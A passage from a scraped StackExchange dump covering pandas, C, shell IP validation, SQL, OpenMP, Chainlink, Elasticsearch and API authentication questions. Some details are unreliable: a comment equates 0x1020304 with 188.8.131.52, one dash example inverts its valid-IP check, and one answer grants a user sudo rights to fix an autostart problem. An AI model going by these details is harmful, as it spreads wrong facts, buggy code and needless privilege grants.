main window","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I turn a dataframe into a markdown vertical table?\n\nQuestion: EDIT Answer:\nThere are two types of tables I needed. One was the regular Horizontal table view. For that, I just used the \"to_markdown()\" with the added code to removed the indeces.\nFor the vertical view I copied and pasted Ehsan's code below and it worked perfectly.\nNow, I wanted to paste these in a nice view to my excel sheet. That would have taken a bunch of work and formatting very specifically, and it won't work out with the to_markdown(), since that changes the DataFrame to a string. To get it as an index, you can't use that function. You'd either have to take your existing DataFrame and figure out how to add new rows and columns, or: create an empty DataFrame with the proper amount of columns and rows, and fill it with the necessary \"|\" formatting. 
After that, you'd have to fill out the empty\/correct cells with data from your DataFrame that contains the data. However, this is too much work, so instead I just copied the string over directly into the proper excel sheet using this code:\n<code>#Now we are going to save this loop's iteration into the proper Excel sheet\n file_source ='Source Used.xlsx'\n\n #load excel file\n workbook = load_workbook(filename=file_source)\n\n #Pick the sheet \"Sheet Used\"\n ws4 = workbook[\"Project X\"]\n\n #modify the desired cell\n ws4.cell(row = 1, column = 1).value = newDataFrameWithStringFormat\n\n #save the file\n workbook.save(filename=file_source)\n<\/code>\nFrom here, anytime I wanted to update my markdown website, I could just pull from the Excel sheet's first cell. It doesn't look pretty, but it works.\nEND EDIT\nI have a table that looks like this:\ndf:\n\nProject 1\nProject 2\nProject 3\n\ndata 1\ndata 2\ndata 3\n\ndata 4\ndata 5\ndata 6\n\ndata 7\ndata 8\ndata 9\n\nI want to edit this table so that it can work with, say, markdown, and be formatted well. However, to do that, I need to add a bunch of formatting to it (it basically needs to look the same as StackOverflow's table setup when writing this question). What function can I apply to it so that a new table is created that looks like this:\n\nAs you can see in this picture, the pipes and hyphens are each a new cell of data. Additionally, the Column HEADERS are at the beginning of the rows, since this is a horizontal format. How can I apply this formatting to dataframes of varying size?\nThis is what the new one should look like (I bolded the Project names myself): \nNow hypothetically, I can transpose the data and use to_markdown(), but that may still run into the issue of the top column being created as a column header. How can I avoid this by making a custom function to add in the pipes (\"|\") and hyphens?\nThank you!\nComment: to_markdown() function in pandas makes a decent work to make a markdown table out pandas data frames - check here, might help: https:\/\/pandas.pydata.org\/docs\/reference\/api\/pandas.DataFrame.to_markdown.html\nComment: I think that's a problem with markdown tables - check here: https:\/\/stackoverflow.com\/questions\/60995936\/vertical-table-headers-i-e-headers-on-the-left-in-markdown based on their suggestion in these cases better to use HTML rather than pure markdown\nComment: The best I can suggest is to transpose the dataframe, set the name of new headers as empty (df.columns = [\"\" for i in range(len(df.columns))]) and then make the first row bold in markdown (** **).\nComment: Yeah... I can see that. I'll probably go the transpose route, since I can easily automate that process. I'll post the code here once I complete it so others can make it work.\n\nThank you so much for your help! I wish I could \"Check\" mark your answer since you helped me out.\nComment: Hey Ehsan, THANK YOU! I spent all that time doing complicated formatting, and it didn't work, but this works well (add in: (df.to_markdown(showindex=False)) to get rid of the index column)\n\nHowever, there is a slight add-on to my question that will require real formatting. 
How can I make the column headers on the left side, as row headers, instead?\nAnswer: A potential answer:\n<code>import pandas as pd\n\ndf=pd.DataFrame({\"Project 1\":[\"data 1\", \"data 4\", \"data 7\"], \"Project 2\": [\"data 2\", \"data 5\", \"data 8\"], \"Project 3\": [\"data 3\", \"data 6\", \"data 9\"]})\n\ndf = df.transpose()\n# remove header\ndf.columns = [\"\" for i in range(len(df.columns))]\n\n# make the index bold - ** ** \ndf.index = [\"**{}**\".format(idx) for idx in df.index]\n# **Project 1** data 1 data 4 data 7\n# **Project 2** data 2 data 5 data 8\n# **Project 3** data 3 data 6 data 9\n\nprint(df.to_markdown())\n#| | | | |\n#|:--------------|:-------|:-------|:-------|\n#| **Project 1** | data 1 | data 4 | data 7 |\n#| **Project 2** | data 2 | data 5 | data 8 |\n#| **Project 3** | data 3 | data 6 | data 9 |\n<\/code>\nWill be like this:\n\nProject 1\ndata 1\ndata 4\ndata 7\n\nProject 2\ndata 2\ndata 5\ndata 8\n\nProject 3\ndata 3\ndata 6\ndata 9\n\nUpdated:\nIn case you want the csv version of the markdown table in your specified format, you can modify the string and save it as a csv file:\n<code>markdown_text = df.to_markdown() # from above code\nmarkdown_csv= markdown_text.replace(\"|\", \",|,\")[1:-1].replace(\",\\n,\",\"\\n\")\nwith open(\"results.csv\", \"w\", encoding=\"utf-8\") as fp:\n fp.write(markdown_csv)\n<\/code>\nThe results will be (you can skip <code>**{}**<\/code>, markdown bold, in case you don't want it - just comment that part of the code):\nComment: Hey Ehsan, this is perfect. Once everything is finished I'll hit the check mark.\n\nI am running into a slight issue. I'm trying to save the new markdown format into an Excel sheet, but the to_markdown() turns the dataframe into a nice big string, which means that I can't save it to an excel sheet. Do you know of any workaround to make this work? If not, I may have to manually add in all of those bars and hyphens, which is half the issue...\nComment: I will update the code - check the updated part (hopefully it will help)\n","meta":{"source":"stackoverflow","title":"How can I turn a dataframe into a markdown vertical table?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Copying 1 variable of 1 type to another variable of another type in C\n\nQuestion: I had an interview yesterday where they had asked me to write a function which accepts 3 arguments,1 source , 1 destination and other the length and this function should copy the value from source to destination based on the length parameter and the types of source and destination could be different.\nCan someone please help me write a generic function ?\nThanks a lot in advance\nComment: Did you have a question?\nComment: Sounds like memcpy: http:\/\/man7.org\/linux\/man-pages\/man3\/memcpy.3.html\nAnswer: You mean <code>memcpy<\/code> (or <code>memmove<\/code>)? 
:P\nA naive implementation (using bytes):\n<code>int my_memcpy(void *dest, const void *src, size_t len)\n{\n if (dest == NULL || src == NULL || src == dest) return -1;\n if (len == 0) return 0;\n\n char *dest_bytes = dest;\n const char *src_bytes = src;\n for(size_t i = 0; i < len; i++) {\n dest_bytes[i] = src_bytes[i];\n }\n return 0;\n}\n<\/code>\nOne can optimise using <code>uint64_t<\/code> pointers (taking care of the remainder with a <code>char *<\/code>) and loop unrolling to copy more data each iteration of the for loop.\n","meta":{"source":"stackoverflow","title":"Copying 1 variable of 1 type to another variable of another type in C","dup_signals":{}},"subset":"stackexchange"} +{"text":"Nextcloud does do not launch at reboot\/restart session (autostart) in Ubuntu 20.04\n\nQuestion: I want to have Nextcloud start when I open my session. Following the instructions to start applications automatically does not work for me; I have to start Nextcloud manually each time I start my session.\n\nI am using Ubuntu 20.04 and Nextcloud client 2.6.5\nEdit: clicking the option in the Nextcloud Client General Settings did not work\nAnswer: My way to add a program on user session startup is firstly install gnome-tweaks.\n<code>sudo apt install gnome-tweaks\n<\/code>\nThen run it from activity menu, and go top Startup program, click on the + to add a new program, then choose Nextcloud from the list.\nAnswer: It should be under the Nextcloud Client General Settings. Click the box to put a check on the option to \"Launch on System Startup\"\nComment: did not work for me unfortunately\nAnswer: It works, if you do it as root.\nFor me, all I had to do is add the user who started up the system to the sudoers:\n<code>sudo usermod -a -G sudo <user_who_started_the_system>\n<\/code>\nHave a look at: https:\/\/devconnected.com\/how-to-add-user-to-sudoers-on-ubuntu-20-04\nto get some more instructions.\n","meta":{"source":"askubuntu","title":"Nextcloud does do not launch at reboot\/restart session (autostart) in Ubuntu 20.04","dup_signals":{}},"subset":"stackexchange"} +{"text":"Validate an ip in dash (not bash)\n\nQuestion: I am trying to validate an ip address within a dash script. I've found many ways to achieve the same with bash such as in linuxjournal\nBasically what is does is a comparision using this:\n<code>if [[ $ip =~ '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$' ]]; then\n do something\nfi\n<\/code>\nIs there any way to get the same with dash?\nUPDATE: This is the final script that does what I needed:\n<code>#In case RANGE is a network range (cidr notation) it's splitted to every ip from \n# that range, otherwise we just keep the ip\nif echo $RANGE | grep -E -q '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\\/[0-9]{1,2}$'; then\n IPS=`prips $RANGE -e ...0,255`\n if [ \"$?\" != \"0\" ] ; then\n echo \"ERROR: Not a valid network range!\"\n exit 1\n fi\nelif echo $RANGE | grep -E -q '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$'; then\n IPS=\"$RANGE\"\nelse\n echo \"$RANGE no is not a valid IP address or network range\"\n exit 1\nfi\n<\/code>\nComment: An IP address is just a 32-bit number. You're asking for dotted-quad notation, but remember that decimal and hex notation are just as valid. 
`0x1020304` and `16909060` are the same as `188.8.131.52`.\nComment: I only need validation for human error, no one other than me and my coleagues will use this script, so I can choose a notation and stick to that.\nComment: With regard to your final regexp, you might also represent it as something a bit shorter: `^([0-9]{1,3}\\.){3}[0-9]{1,3}\\\/[0-9]{1,2}$`\nComment: You're using a bunch of different external commands, while it is quite possible to do this nice and cleanly using only `dash` builtins. (See my response below if you're curious as to how.)\nAnswer: You can build a <code>case<\/code> statement, although it will be more verbose than a regex. On the other hand, you avoid spawning any external processes, and it might be easier to read and maintain to boot.\n<code>if case $ip in\n # Invalid if it contains any character other than number or dot\n # Invalid if it contains more than three dots\n # Invalid if it contains two adjacent dots\n # Invalid if it begins with a non-number\n # Invalid if it ends with a non-number\n *[!.0-9]* | *.*.*.*.* | *..* | [!0-9]* | *[!0-9] ) false ;;\n # Invalid if it contains a number bigger than 255:\n # 256-259 or 260-299 or 300-999 or four adjacent digits\n *25[6-9]* | *2[6-9][0-9]* | *[3-9][0-9][0-9]* | *[0-9][0-9][0-9][0-9]* ) false;;\n # Verify that it contains three dots\n *.*.*.* ) true ;;\n # Failing that, invalid after all (too few dots)\n *) false ;;\nesac; then\n echo \"$ip\" is valid\nfi\n<\/code>\nNotice the funky use of a <code>case<\/code> statement (returning either true or false) as the condition in an <code>if<\/code> statement.\nThis is slightly stricter than the regex in that it requires each octet to be less than 256.\nComment: I would not love to have to debug a function like that... :\/\nAnswer: Assuming you are happy with the validation string:\n\n$ s='[0-9]\\{1,3\\}'\n$ echo $ip | grep > \/dev\/null \"^$s\\.$s\\.$s\\.$s$\" &&\n echo $ip is valid\n\nNote that this accepts invalid ip addresses like 8220.127.116.11\nTo validate an ip, it's really not convenient to use a regular expression. A relative easy thing to do is:\n\nIFS=. read a b c d << EOF\n$ip\nEOF\n\nif ( for i in a b c d; do\n eval test \\$$i -gt 0 && eval test \\$$i -le 255 || exit 1\n done 2> \/dev\/null )\nthen\n echo $ip is valid\nfi\nComment: Great, the only issue is that I need the -E flag to get the regex evaluated (or using egrep)\nThanks so much\nComment: Extended regular expressions should only be needed if you use s='[0-9]{1,3}'. If you escape the brackets, basic regular expressions should work. (Ah, you made your comment prior to my edit...)\nComment: Also, the redirection thing is a bit weird. Just use `egrep -q \"regex\"` instead.\nComment: @ghoti I've always avoided -q for portability reasons, but just discovered that it is specified in the Open Group spec which is probably portable enough!\nComment: @ghoti On the other hand, grep -q could be considered bloat: http:\/\/harmful.cat-v.org\/cat-v\/\nComment: Whether it's bloat is up for debate. A grep with redirection is guaranteed to traverse every line of input, whereas the `-q` behaviour could be to exit after the first match. Where does one draw the line? Is it better to have a whole 'nuther tool, \"gree\" for example, to Globally search for a RE, then Exit?\nAnswer: Here is a small <code>dash<\/code> shell function which does not use any external commands and that checks if an IPv4 address is valid. 
It returns true if the address was correctly formatted, false otherwise.\nI've tried to explain the magic in my comments.\n<code>valid_ip() {\n local IP=\"$1\" IFS=\".\" PART # make vars local, get arg, set $IFS\n set -- $IP # split on $IFS, set $1, $2 etc.\n [ \"$#\" != 4 ] && return 1 # BAD: if not 4 parts\n for PART; do # loop over $1, $2 etc.\n case \"$PART\" in\n *[!0-9]*) return 1 # BAD: if $PART contains non-digit\n esac\n [ \"$PART\" -gt 255 ] && return 1 # BAD: if $PART > 255\n done\n return 0 # GOOD: nothing bad found\n}\n<\/code>\nWith this function you can test your IP address, e.g. to abort your script if the IP address is invalid:\n<code>if valid_ip \"$IP\"; then\n echo \"ERROR: IP address '$IP' is invalid\" >&2\n exit 4\nfi\n<\/code>\n","meta":{"source":"stackoverflow","title":"Validate an ip in dash (not bash)","dup_signals":{}},"subset":"stackexchange"} +{"text":"convert multiple MySQL queries into a single query\n\nQuestion: QUERY 1...\n<code>$result = $wpdb->get_results(\"SELECT wp_users.ID,wp_users.user_login,wp_users.user_registered,wp_users.user_email,t.total,t.acc_nums FROM wp_users LEFT JOIN wp_usermeta ON ( wp_users.ID = wp_usermeta.user_id ) left join (SELECT count(*) as total,user_id,Group_concat(account_number) as acc_nums FROM `user_per_bank` group by user_id) as t on t.user_id=wp_users.ID WHERE 1=1 AND ( \n ( \n( wp_usermeta.meta_key = 'wp_capabilities' AND wp_usermeta.meta_value LIKE '%\\\"editor\\\"%' )\n )\n) ORDER BY user_registered DESC\", ARRAY_A);\n<\/code>\nTO BE COMBINED WITH QUERY...\n<code>$out = $wpdb->get_results('SELECT `user_id`, sum(`amount`) as outstanding FROM `assist_trans` LEFT JOIN `wp_users` ON wp_users.id = assist_trans.user_id WHERE `status` IN (0,2,4) GROUP BY assist_trans.user_id ORDER DESC');\n<\/code>\nso that \"$out\" variable can be dropped and I can use \"$result\" instead...\nAnswer: If I've understood your question correctly, you need to make a join from the first query to the second, and have the <code>outstanding<\/code> column in the result set. Something like this should work. It's untested, but it should point you in the right direction if I've made an error.\nThe only changes (besides formatting) are the new join and the additional column in the result set.\n<code>$result = $wpdb->get_results(\"SELECT wp_users.ID,\n wp_users.user_login,\n wp_users.user_registered,\n wp_users.user_email,\n t.total,\n t.acc_nums,\n o.outstanding\n FROM wp_users\n LEFT JOIN wp_usermeta ON ( wp_users.ID = wp_usermeta.user_id )\n LEFT JOIN (\n SELECT count(*) as total,\n user_id,\n Group_concat(account_number) as acc_nums\n FROM `user_per_bank`\n GROUP BY user_id) as t on t.user_id = wp_users.ID\n LEFT JOIN (\n SELECT `user_id`, sum(`amount`) as outstanding\n FROM `assist_trans`\n LEFT JOIN `wp_users` ON wp_users.id = assist_trans.user_id\n WHERE `status` IN (0,2,4)\n GROUP BY assist_trans.user_id) as o ON ( wp_users.ID = o.user_id )\n WHERE 1=1\n AND ( \n ( \n ( wp_usermeta.meta_key = 'wp_capabilities' AND wp_usermeta.meta_value LIKE '%\\\"editor\\\"%' )\n )\n )\n ORDER BY user_registered DESC\",\n ARRAY_A);\n<\/code>\nComment: This is perfect it works like I wanted but can you help me to echo the added column? This is used in a \"foreach ($result as $res) {\" loop so I only need to add the last column now!\nComment: Nevermind I got it working with echo $res['outstanding']; THANK YOU VERY MUCH for your help!\nComment: Sorry, just saw that. 
Glad it solved your problem (and that you solved your followup problem); thanks for accepting\n","meta":{"source":"stackoverflow","title":"convert multiple MySQL queries into a single query","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to parellalize histogram addition?\n\nQuestion: I have this algoritmo which scans an image and for each pixel p calculates a 256 bins histogram in which values of the pixel inside a patch around p are saved. The algorithm needs to be O(1) so a need to do many histogram addition, I'd like to make the algorithm faster by parallelizing the histogram addition with OpenMP, so I added <code>#pragma omp parallel for<\/code> before each for (just the ones with histogram additions) but it actually makes it 10 times slower. I think i need to create a parallel region outside but I don't understand how.\nAlso, I'm afraid the overhead generated by OpenMP overcomes the speed gained by the parallelization of a 256-for, but I don't know for sure\n<code>for (int i = 0; i < src.rows; i++) {\n for (int j = 0; j < src.cols; j++) {\n if (j == 0)\n { ... }\n else {\n if (j > side\/2) { \/\/ subtract col\n for (int h = 0; h < 256; h++) \/\/ THIS ONE\n histogram[h] -= colHisto[j - (side\/2) - 1][h];\n }\n if (j < src.cols - side\/2) { \/\/ add column\n if (i > side\/2) { \/\/ subtract pixel\n colHisto[j + side\/2][src.at<uchar>(i - side\/2 - 1, j + side\/2)]--;\n }\n if (i < src.rows - side\/2) { \/\/ add pixel\n colHisto[j + side\/2][src.at<uchar>(i + side\/2, j + side\/2)]++;\n }\n\n for (int h = 0; h < 256; h++) \/\/ AND THIS ONE\n histogram[h] += colHisto[j + side\/2][h];\n }\n }\n }\n}\n<\/code>\nComment: A histogram algorithm can never be O(1) since it has to inspect each element of the array at least once. This makes it O(n) where n is the array size (or number of patches). No amount of parallelization can change the time complexity.\nComment: Possible duplicate of [Calculate the histogram with OpenMP](https:\/\/stackoverflow.com\/questions\/21777819\/calculate-the-histogram-with-openmp)\nComment: please forget about the complexity (it's O(1) respect to the patch's radius) it's really irrelevant here i just need to parallelize those 256 loops, but the issue are those outer loops\nComment: Can you add some more detail? How large is a typical input image? How large are the patches? Are you using OpenCV? What is the memory layout of the images? And most important: did you verify your results with optimizations enabled?\nComment: I need to obtain this behaviour with OpenMP:\n```\n#pragma omp parallel private(i,j,me,n)\n{\n #pragma omp single\n {\n for (int i = 0; i < 10; i++) {\n for (int j = 0; j < 10; j++) {\n if (j == 0)\n #pragma omp for\n for (int h = 0; h < 256; h++) \/\/ THIS ONE\n histogram[h] += h2[h];\n }\n }\n }\n }\n}\n```\nComment: Have you looked at the other discussions of OpenMP Histograms on SO, e.g. https:\/\/stackoverflow.com\/questions\/21777819\/calculate-the-histogram-with-openmp? If that doesn't help, please create a [mcve] (read that page very carefully)!\nComment: Well I can't help if you don't provide more details. And just forcing to use openmp won't solve anything.\nAnswer: I actually solved myself by studying OpenMP more here is the code\n<code>#pragma omp parallel\n{\n for (int i = 0; i < src.rows; i++) {\n for (int j = 0; j < src.cols; j++) {\n \/\/ printf(\"%d%d:\", i, j);\n if (j == 0) { ... }\n else {\n #pragma omp single\n { ... 
}\n\n one = getTickCount();\n #pragma omp for\n for (int h = 0; h < 256; h++)\n histogram[h] += colHisto[j + side \/ 2][h];\n printf(\"histotime = %d\\n\", getTickCount() - one);\n }\n }\n }\n}\n<\/code>\nIt's significantly faster than putting <code>#pragma omp parallel for<\/code> before each loop but still slower than the sequential version\n","meta":{"source":"stackoverflow","title":"How to parellalize histogram addition?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Chainlink Large Responses\n\nQuestion: I run this code from the chainlink documentation but didn't get the image.\n<code>function requestBytes() public returns (bytes32 requestId) {\n address oracle = \"0xc57B33452b4F7BB189bB5AfaE9cc4aBa1f7a4FD8\";\n bytes32 specId = \"7a97ff8493ec406d90621b2531f9251a\";\n uint256 payment = 100000000000000000;\n Chainlink.Request memory req = buildChainlinkRequest(specId, address(this), this.fulfillBytes.selector);\n req.add(\"get\",\"https:\/\/ipfs.io\/ipfs\/QmZgsvrA1o1C8BGCrx6mHTqR1Ui1XqbCrtbMVrRLHtuPVD?filename=big-api-response.json\");\n req.add(\"path\", \"image\");\n return sendChainlinkRequestTo(oracle, req, payment);\n}\n\nevent RequestFulfilled(\n bytes32 indexed requestId,\n bytes indexed data\n);\n\nfunction fulfillBytes(\n bytes32 requestId,\n bytes memory bytesData\n)\n public\n recordChainlinkFulfillment(requestId)\n{\n emit RequestFulfilled(requestId, bytesData);\n data = bytesData;\n url = string(data);\n}\n<\/code>\nComment: where do you get kovan testnet ??\nComment: I tried to deploy rinkeby test network as I don't have the Kovan public testnet.\nComment: I just tried running this example from the docs on Kovan, and it worked fine. Can you try again? Steps I took were compile the project in remix, deploy on kovan, fund with some LINK, execute the request_bytes function, wait 30 secs, then execute the data and image_url getter functions to see the results https:\/\/remix.ethereum.org\/#optimize=false&evmVersion=null&runs=200&version=soljson-v0.8.6+commit.11564f7e.js&url=https:\/\/github.com\/smartcontractkit\/documentation\/blob\/main\/_includes\/samples\/APIRequests\/GenericBigWord.sol\nComment: I deployed the example contract code to the Kovan public testnet using MetaMask. Where were you deploying it to?\nComment: @yamnaiftikhar Can you share the contract address on the Rinkeby testnet as well as the transaction invoking the `requestBytes()` function?\nComment: @PetrHejda here is an example using the same code: https:\/\/kovan.etherscan.io\/tx\/0x1d1fd1385f4eecb9e05ef4bded4282c46f3301716081eb24b3f99349f654102a\nComment: Thank you @Roch. My reason behind asking OP for their tx details is searching for the issue in the actual transaction - such as incorrect `data`, insufficient LINK balance, possibly using a call instead of a tx (if there's no tx hash), ...\nAnswer: Your best bet for troubleshooting job execution issues is to check your oracle contract for any recent transactions within the related block explorer:\n\nIf there are no transactions within your oracle contract during the associated timeframe, this likely means the job run errored out within the Chainlink node. 
Check your Chainlink node logs (or navigate to the respective job run from within the Chainlink GUI) for more information.\n\nIf there is a recent transaction within your oracle contract during the associated timeframe, but the transaction failed with an <code>out of gas<\/code> exception, you'll need to increase the gas limit of the respective oracle job, as the gas required to write the data that you are requesting exceeds your node's configured limit (typically 500000 gas). You can configure this limit on a per-job basis by adding the <code>gasLimit<\/code> attribute to your <code>ethTx<\/code> job task: https:\/\/docs.chain.link\/chainlink-nodes\/oracle-jobs\/all-tasks#eth-tx-task.\n\nIf there is a recent transaction within your oracle contract during the associated timeframe, but the transaction failed due to some other <code>execution error<\/code>, you may have some logical error in your consumer contract's fulfill function. Check your contract's fulfill function for coding errors, and try again.\n\nI hope that helps!\n","meta":{"source":"stackoverflow","title":"Chainlink Large Responses","dup_signals":{}},"subset":"stackexchange"} +{"text":"Elasticsearch and Fluentd optimisation for log cluster\n\nQuestion: we are using Elasticsearch and Fluentd for Central logging platform. below is our Config details:\nElasticsearch Cluster:\n<code>Master Nodes: 64Gb Ram, 8 CPU, 9 instances\nData Nodes: 64Gb Ram, 8 CPU, 40 instances\nCoordinator Nodes: 64Gb Ram, 8Cpu, 20 instances\n<\/code>\nFluentd: at any given time we have around 1000+ fluentd instances writing logs to Elasticsearch coordinator nodes.\nand on daily basis we create around 700-800 indices and which total to 4K shards on daily basis. and we keep maximum 40K shards on cluster.\nwe started facing performance issue on Fluentd side, where fluentd instances fails to write logs. common issues are :\n<code> 1. read time out\n 2. request time out\n 3. {\"time\":\"2021-07-02\",\"level\":\"warn\",\"message\":\"failed to flush the buffer. 
retry_time=9 next_retry_seconds=2021-07-02 07:23:08 265795215088800420057\/274877906944000000000 +0000 chunk=\\\"5c61e5fa4909c276a58b2efd158b832d\\\" error_class=Fluent::Plugin::ElasticsearchOutput::RecoverableRequestFailure error=\\\"could not push logs to Elasticsearch cluster ({:host=>\\\\\\\"logs-es-data.internal.tech\\\\\\\", :port=>9200, :scheme=>\\\\\\\"http\\\\\\\"}): [429] {\\\\\\\"error\\\\\\\":{\\\\\\\"root_cause\\\\\\\":[{\\\\\\\"type\\\\\\\":\\\\\\\"circuit_breaking_exception\\\\\\\",\\\\\\\"reason\\\\\\\":\\\\\\\"[parent] Data too large, data for [<http_request>] would be [32274168710\/30gb], which is larger than the limit of [31621696716\/29.4gb], real usage: [32268504992\/30gb], new bytes reserved: [5663718\/5.4mb], usages [request=0\/0b, fielddata=0\/0b, in_flight_requests=17598408008\/16.3gb, model_inference=0\/0b, accounting=0\/0b]\\\\\\\",\\\\\\\"bytes_wanted\\\\\\\":32274168710,\\\\\\\"bytes_limit\\\\\\\":31621696716,\\\\\\\"durability\\\\\\\":\\\\\\\"TRANSIENT\\\\\\\"}],\\\\\\\"type\\\\\\\":\\\\\\\"circuit_breaking_exception\\\\\\\",\\\\\\\"reason\\\\\\\":\\\\\\\"[parent] Data too large, data for [<http_request>] would be [32274168710\/30gb], which is larger than the limit of [31621696716\/29.4gb], real usage: [32268504992\/30gb], new bytes reserved: [5663718\/5.4mb], usages [request=0\/0b, fielddata=0\/0b, in_flight_requests=17598408008\/16.3gb, model_inference=0\/0b, accounting=0\/0b]\\\\\\\",\\\\\\\"bytes_wanted\\\\\\\":32274168710,\\\\\\\"bytes_limit\\\\\\\":31621696716,\\\\\\\"durability\\\\\\\":\\\\\\\"TRANSIENT\\\\\\\"},\\\\\\\"status\\\\\\\":429}\\\"\",\"worker_id\":0}\n<\/code>\nlooking for guidance on this, how we can optimise our Logs cluster?\nComment: Does this answer your question? [\"\\[circuit\\_breaking\\_exception\\] \\[parent\\]\" Data too large, data for \"\\[\\]\" would be error](https:\/\/stackoverflow.com\/questions\/61870751\/circuit-breaking-exception-parent-data-too-large-data-for-http-request)\nComment: @Azeem no, we already have 31Gb heap on server size of 64Gb Ram.\nComment: Could you please share your ElasticSearch configuration? And, what do you mean by \"read timeout\" error?\nAnswer: Well, by the looks of it, you have exhausted your parent circuit breaker limit of 95% of Heap Memory.\nThe error you mentioned has been mentioned in the elasticsearch docs -\n[1]: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/fix-common-cluster-issues.html#diagnose-circuit-breaker-errors\n. 
The page also refers to a few steps you can take to Reduce JVM memory pressure, which can be helpful to reduce this error.\nYou can also try increasing this limit to 98%, using the dynamic command -\n<code>PUT \/_cluster\/settings\n{\n \"persistent\" : {\n \"indices.breaker.total.limit\" : \"98%\" \n }\n}\n<\/code>\nBut I would suggest this be performance tested before applying in production.\nSince your request is 30GB, which is a bit too much, for a more reliable solution, I would suggest increasing your log scrapers frequency, so that it makes more frequent posts to ES with smaller-sized data blocks.\n","meta":{"source":"stackoverflow","title":"Elasticsearch and Fluentd optimisation for log cluster","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating XML from MSSQL\n\nQuestion: How can I create the following XML from MS SQL?\nI've looked and google and cant see for my specific example as below, thanks.\nThis would be from an SQL query using XML PATH in some manner.\n<code><message>\n<header date=\"15\/07\/2016\" userid=\"QUOTEJOB\">\n <schema name=\"TKJobLoaderSchema\" version=\"1.0\" \/>\n <source system=\"\" product=\"\" productversion=\"\" \/>\n <destination system=\"\" product=\"\" productversion=\"\" \/>\n<\/header>\n<body>\n <jobs>\n <job action=\"jmCreate\" company=\"02\" contract=\"QW\" description=\"test job\" job_type=\"02\" priority=\"5\" created_by=\"QUOTEJOB\">\n <job_lines>\n <job_line line_no=\"1\" line_type=\"SOR\" code=\"AQW\" quantity=\"1916.5\" \/>\n <\/job_lines>\n <job_narratives>\n <job_narrative id=\"2\" narrative=\"4678f874-314c-4584-99e3-c69e3af71999\" \/>\n <\/job_narratives>\n <job_property company=\"02\" ref=\"02363\" \/>\n <\/job>\n <\/jobs>\n<\/body>\n<\/message>\n<\/code>\nComment: Create this XML from **what**? This question is unclear.\nComment: Do you want to generate xml from SQL select query?\nComment: Is there any `1:n` nested data in deeper level? This sample looks nested but plain `1:1`...\nComment: Where is the data coming from? table, literals, variables...?\nComment: Hi,sorry ive updated the question. it was to do it from an sql query and make the xml structure as it is above with message as the root, and header and body inside that, each with there attributes and further levels inside. all the examples I can find are where you would have message, then maybe header as repeatable, and no other separate sections. 
and no I just needs to be as above, no deeper nesting etc\nComment: Please provide SQL schema and example data.\nAnswer: Assuming, that every value is <code>1:1<\/code> your given sample can be created like the following (replace the literals with your actual column names, variables, whatever):\n<code>SELECT {d'2016-07-15'} AS [header\/@date]\n ,'QUOTEJOB' AS [header\/@userid]\n ,'TKJobLoaderSchema' AS [header\/schema\/@name]\n ,'1.0' AS [header\/schema\/@version]\n ,'' AS [header\/source\/@system]\n ,'' AS [header\/source\/@product]\n ,'' AS [header\/source\/@productversion]\n ,'' AS [header\/destination\/@system]\n ,'' AS [header\/destination\/@product]\n ,'' AS [header\/destination\/@productversion]\n ,'jmCreate' AS [body\/jobs\/job\/@action]\n ,'02' AS [body\/jobs\/job\/@company]\n --more attributes of <job>\n ,1 AS [body\/jobs\/job\/job_lines\/job_line\/@line_no]\n --more attributes of <job_line>\n ,2 AS [body\/jobs\/job\/job_narratives\/job_narrative\/@id]\n --more attributes of <job_narrative>\n ,'02' AS [body\/jobs\/job\/job_property\/@company]\n ,'02363' AS [body\/jobs\/job\/job_property\/@ref]\nFOR XML PATH('message')\n<\/code>\nThe result\n<code><message>\n <header date=\"2016-07-15T00:00:00\" userid=\"QUOTEJOB\">\n <schema name=\"TKJobLoaderSchema\" version=\"1.0\" \/>\n <source system=\"\" product=\"\" productversion=\"\" \/>\n <destination system=\"\" product=\"\" productversion=\"\" \/>\n <\/header>\n <body>\n <jobs>\n <job action=\"jmCreate\" company=\"02\">\n <job_lines>\n <job_line line_no=\"1\" \/>\n <\/job_lines>\n <job_narratives>\n <job_narrative id=\"2\" \/>\n <\/job_narratives>\n <job_property company=\"02\" ref=\"02363\" \/>\n <\/job>\n <\/jobs>\n <\/body>\n<\/message>\n<\/code>\nComment: Yes! This is exactly what I needed. Thanks\n","meta":{"source":"stackoverflow","title":"Creating XML from MSSQL","dup_signals":{}},"subset":"stackexchange"} +{"text":"DRY API Authentication Design Between Services\n\nQuestion: I am creating an API service that is going to require authentication. this will be the first part of a project that will include a front-end service for my website, and also open up the api for 3rd party client front-ends to the service.\nI have been planning out how I am going to split my site into the backend\/frontend and think I have come up with a solution where I don't have to have duplicate user tables, but wanted to see if there were any gaping holes in my logic by asking a question here.\nThe auth system is designed to be similar to the Amazon AWS S3 auth system \u2014 assigning each user a key and secret, then using the secret to sign the api requests from the front-end clients. The api then looks up the user from the api_key, verifies that it was signed with the user's api_secret and goes from there.\nThe biggest hurdle is that I want my user model to live in the fronted. This is due to the existing ties between the user, subscription models and payment information that really have no place in the API service. To work with this, when the API needs to lookup a user api_secret, it has to communicate back to my front-end app (over a secure https line, and a different thread) to get it. This picture will help explain that in step 4.\n\nI think that this will provide a secure auth system for the api, and a way for any front-end client or 3rd party client to implement steps 1 and 2, while not duplicating any user data in the backend. 
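To make the signing in steps 1 and 2 concrete, this is roughly what I have in mind. It is only a sketch: the header names and the canonical string are my own invention rather than something taken from an existing library.
<code>import hashlib
import hmac
import time

def sign_request(api_key, api_secret, method, path, body=''):
    # Canonical string: method, path, body hash and a timestamp, newline separated.
    timestamp = str(int(time.time()))
    body_hash = hashlib.sha256(body.encode()).hexdigest()
    to_sign = '\n'.join([method.upper(), path, body_hash, timestamp])
    signature = hmac.new(api_secret.encode(), to_sign.encode(), hashlib.sha256).hexdigest()
    # The client sends the key, timestamp and signature as headers; the API looks up
    # the secret (step 4), recomputes the signature and compares with hmac.compare_digest.
    return {'X-Api-Key': api_key, 'X-Timestamp': timestamp, 'X-Signature': signature}
<\/code>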
